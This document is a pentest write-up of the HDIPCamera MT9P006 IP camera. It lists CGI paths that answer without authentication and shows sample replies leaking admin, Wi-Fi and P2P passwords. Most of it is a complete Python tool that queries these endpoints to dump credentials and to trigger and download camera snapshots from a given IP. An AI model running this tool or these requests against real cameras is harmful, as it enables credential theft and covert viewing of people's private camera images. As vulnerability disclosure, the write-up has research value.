Exploiting HDIPCamera MT9P006

I pentested a camera, finding numerous vulnerabilities.
Product info:
HDIPCamera MT9P006
Version 1.0.1.2 (Dec 4 2015)
1/2.5-Inch 5 Mp CMOS Digital Image Sensor
Boardtype: 5300
sensortype: mt9p006
found in applications like:
• Digital still cameras
• Digital video cameras
• PC cameras
• Converged DSCs/camcorders
• Cellular phones
• PDAs
Let’s have a look. 😉
By just examining the source I found a few unprotected CGI requests.
A few important CGI requests can be used without any authorisation.

First getting some basic info

var serialNum="VVVIPCxxxxxxxxxxxx-xxxxxxxxxxxxx";
var model="RT_IPC"; var hardVersion="5300-mt9p006";
var softVersion="V2.3.5.2505-S50-SMA-B20151204B";
var ipcname="IPCAM";
var startdate="2016-8-30 21:56:44";
var runtimes="0 day, 1:58";
var sdstatus="out";
var sdfreespace="0 ";
var sdtotalspace="0 ";
var builddate="Dec 4 2015 ";
var productmodel="null";
var vendor="RTJ";
var swver="";
var hwver="";
var mppver="mpp";

P2P info

var p2p_enable = "1";
var p2p_id = "PPIV-xxxxx-WZDZZ";
var p2p_pwd = "xxx";

Wifi info

var wifissid = "xxx";
var wifikeytype = "3";
var wifiwhichkey = "0";
var wifikey="xxxxxxxxxxxxxxxx";
var wifienable="0";
var wifimac="xx:xx:xx:xx:xx:xx";
var wifienable="0";
var linkstatus="0";
var linkssid="";
var wifimode="";

rtsp info

var rtsplisnport="554";
var onvif_http_port="1018";
var rtsp_user_verify="0";

User info (Including passwords)

var name0="admin";
var password0="admin";
var authLevel0="255";
var name1="guest";
var password1="guest";
var authLevel1="3";
var name2="xxx";
var password2="xxx";
var authLevel2="3";
var name3="xxx";
var password3="xxx";
var authLevel3="3";
var name4="";
var password4="";
var authLevel4="3";
var name5="";
var password5="";
var authLevel5="3";
var name6="";
var password6="";
var authLevel6="3";
var name7="";
var password7="";
var authLevel7="3";
var name8="";
var password8="";
var authLevel8="0";
var name9="";
var password9="";
var authLevel9="0";
It’s getting even better.
A world-readable URL with all the snapshots taken.
Oh wait... let's make some snapshots...
outputs:
var path="/tmpfs/snap_tmpfs/20160831/IMG001/IMG_chn0_TIMER_MNG_20160831230808_001.jpg"
... a freshly made snapshot.
I made a Python script that uses these CGIs and outputs all the info.
It can also take a snapshot and save it locally.
#!/bin/python

# Quick & Dirty tool
# Get all the info from the IPcam 5300 MT9P006
#
# Use commandline parameters to retrieve all kinds of info
#
# usage for all the info
# python IPcam_5300-mt9p006.py --ip <ip> --snapshot --getp2p --getwifi --getrtsp --getusers

import urllib
import urllib2
import re
import argparse

# CGI paths on the camera's web server. Per the write-up above, the device
# answers all of them without authentication; the p2p, wifi and getuser
# replies include credentials in cleartext, which is the core finding.
p2p="/cgi-bin/p2p.cgi?cmd=p2p.cgi&-action=get"    # P2P id and password (see "P2P info" above)
wifi="/cgi-bin/getwifiattr.cgi"                   # Wi-Fi SSID and key (see "Wifi info" above)
rtsp="/cgi-bin/hi3510/getrtsplisnport.cgi"        # RTSP / ONVIF port settings (see "rtsp info" above)
snap="/web/cgi-bin/hi3510/param.cgi?cmd=snap"     # triggers a capture; reply is 'var path="..."' with the image location
snap_dir="/tmpfs/snap_tmpfs/"                     # directory the snapshots land in on the device; not referenced in this file
users="/web/cgi-bin/hi3510/param.cgi?cmd=getuser" # user list incl. passwords (see "User info" above)

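def get_param():
    """Parse the command-line options and return the argparse namespace.

    ``--ip`` is the only required value; every other option is a boolean
    flag selecting one CGI query to run against the device.

    Returns:
        argparse.Namespace with the attributes ``ip``, ``snapshot``,
        ``getp2p``, ``getwifi``, ``getrtsp`` and ``getusers``.

    Usage errors are reported by argparse itself (message + exit), so no
    extra handling is needed. The previous ``except IOError, msg`` wrapper
    used Python-2.5-only syntax, could reference ``parser`` before it was
    bound, and handled an exception argparse never raises.
    """
    print("./IPcam_5300-mt9p600.py -h for cmd options")
    parser = argparse.ArgumentParser()
    parser.add_argument("--ip", dest="ip", default="", help="ip adres", required=True)
    parser.add_argument("--snapshot", dest="snapshot", action="store_true", help="make and download snapshot")
    parser.add_argument("--getp2p", dest="getp2p", action="store_true", help="get p2p info (incl. password)")
    parser.add_argument("--getwifi", dest="getwifi", action="store_true", help="get wifi info (incl. password)")
    parser.add_argument("--getrtsp", dest="getrtsp", action="store_true", help="get rtsp info")
    parser.add_argument("--getusers", dest="getusers", action="store_true", help="get user info (incl. passwords)")
    return parser.parse_args()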

def main():
    """Run the queries selected on the command line against one camera.

    Each flag maps to a plain HTTP GET of one CGI path (see the module-level
    constants); the device answers these without any authentication, which
    is the weakness the write-up demonstrates. Info replies are printed
    verbatim. ``--snapshot`` first asks the device to capture an image, then
    downloads the image at the path the device reports and saves it locally
    under the ``IMG_...jpg`` part of that path.
    """
    params = get_param()
    base_url = "http://" + params.ip

    def fetch(path):
        # One unauthenticated GET; returns the raw response body.
        return urllib2.urlopen(urllib2.Request(base_url + path)).read()

    if params.snapshot:
        print("make and download snapshot\n")
        reply = fetch(snap)
        # Reply has the form  var path="/tmpfs/.../IMG_...jpg"  -- keep
        # everything from the first slash, then drop the trailing quote and newline.
        snapfile_path = re.search(r"/(.*)", reply).group(0)[:-2]
        # NOTE(review): the local filename is lifted from the device reply as-is.
        snap_filename = re.search(r"IMG_(.*).jpg", snapfile_path).group(0)
        print("Snap file url: %s" % snapfile_path)
        print("Save output to: %s " % snap_filename)
        with open(snap_filename, "wb") as image_file:
            image_file.write(fetch(snapfile_path))

    # (flag, banner, CGI path) in the order the original checks ran.
    info_queries = (
        (params.getp2p, "Get p2p info", p2p),
        (params.getwifi, "Get wifi info", wifi),
        (params.getrtsp, "Get rtsp info", rtsp),
        (params.getusers, "Get users info", users),
    )
    for selected, banner, path in info_queries:
        if selected:
            print(banner)
            print(fetch(path))

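# Script entry point; indented with four spaces like the rest of the file
# (the original used two here).
if __name__ == "__main__":
    main()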